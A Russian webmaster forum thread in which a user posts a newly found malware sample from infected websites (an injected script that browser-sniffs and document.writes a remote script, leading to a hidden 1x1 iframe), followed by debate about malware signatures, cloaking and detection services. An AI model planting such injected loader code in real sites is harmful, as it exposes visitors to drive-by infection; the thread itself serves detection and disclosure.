- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
1)
<SCRIPT language="JavaScript" type="text/javascript" src="/_inc/_common/js/common_.js"></SCRIPT>
ИЛИ
<SCRIPT language="Javascript" src="http:/img/codes.js"></SCRIPT>
Скрипт естественно может быть любой.
2) В common.js:
if (navigator.appName == "Opera") { ;document.write('<script src="//liveinternet.ru/click?XXXXXXXX /'+Math.round(Math.random()*XXXXXXXX)+'.js"></script>'); } if (navigator.appName == "Microsoft Internet Explorer") { ;document.write('<script src="//liveinternet.ru/click?XXXXXXXXXXXX/'+Math.round(Math.random()*XXXXXXXX)+'.js"></script>'); };
3) GET XXXXXXXX/XXXXXX.js
document.write('<div style="visibility:hidden; position:absolute;"><iframe id="AdFox_iframe" frameBorder="0" src="//XXXXXXXXX/XXXXXXX.html" width="1" height="1" ></iframe></div>');
...
пустая информация!!!
ни названия движка, ни анализа попадания, ни заплаток...
Было найдено на двух сайтах.
CMS-детекторами определить не удалось.
Анализ попадания и заплатки это не моё. Я занимаюсь тем, что ищу подобные сайты. Пилю, а точнее допилил, свою собственную safebrowsing.
Оба сайта, кстати, до сих пор не помечены ни яндексе, ни в google.
---------- Добавлено 10.02.2014 в 14:10 ----------
Смысл в том, что здесь собираюсь публиковать самые новые вирусные образцы, которые нахожу.
И если сегодня Yandex или Google SafeBrowsing не банит за это, то завтра вполне.
А я нахожу это уже сегодня. Вот в чем ценность этой информации.
virusdomain, не обижайтесь, но вы ерундой занимаетесь.
TF-Studio, Поясните?
Хотя...
подпись: kgtu5 - помогу с сайтом, удалю вирусы -> отзывы ТУТ и ТАМ
подпись: TF-Studio - Защищаем свои сайты от взлома - для получения инвайта пишите в личку свою почту.
И уж не за бесплатно работаем. А тут какой-то дебил палит темы... Да?
А по делу. Как и AK47.info (TF-Studio) так и почему-то хваленый antivirus-alarm.ru и подобные:
1) Где взять новые сигнатуры?
2) А если заражение идет через флеш, как поймаете. Не говоря уже о чем то другом.
3) А вот возьму и на лету проверю "правильный" сайт. Запишу в блокнотик ip, и не буду показывать этому ip ничего.
Прежде чем крякать - стоит посмотреть.
Когда я их искал?
я не занимаюсь лечением сайтов и не принимаю заказы.
вы для начала объясните смысл вашего топика, желательно без соплей и нытья.
TF-Studio,
Прежде чем крякать - стоит посмотреть
Согласен, извиняюсь.
Насколько я понял ваш сервис сверяет дамп страницы, с сохранением и если изменился - алерт.
Возможно более узко - проверяется появлние новых iframe script.
Вот узкие места:
- вредоносный код загружается из стороннего ресурса(AD)
- узнать используемые ip, добавив левый сайт, и выдавать, что "нужно". Это к сожалению главный баг.
Я пошел по другому пути.
"С потолка" я получаю свежие сигнатуры, и простейшим сканером ищу их.
Получается по 50-100 найденных за сутки.
При 100-160K обследуемых.
Цель самопиар через полезную работу.
С учетом вашего ника - это глюки...
GKC,
Чем могу доказать свою состоятельность?
Вообще-то я не хотел разбрасывать больше одного примера за день, но ради дела...
Могу гаранту скинуть адрес зараженного сайта, при этом он не обнаруживается Y или G safebrowsing.
Антивирусами тоже не обнаруживается?
TF-Studio,
Да
проверим через virustotal.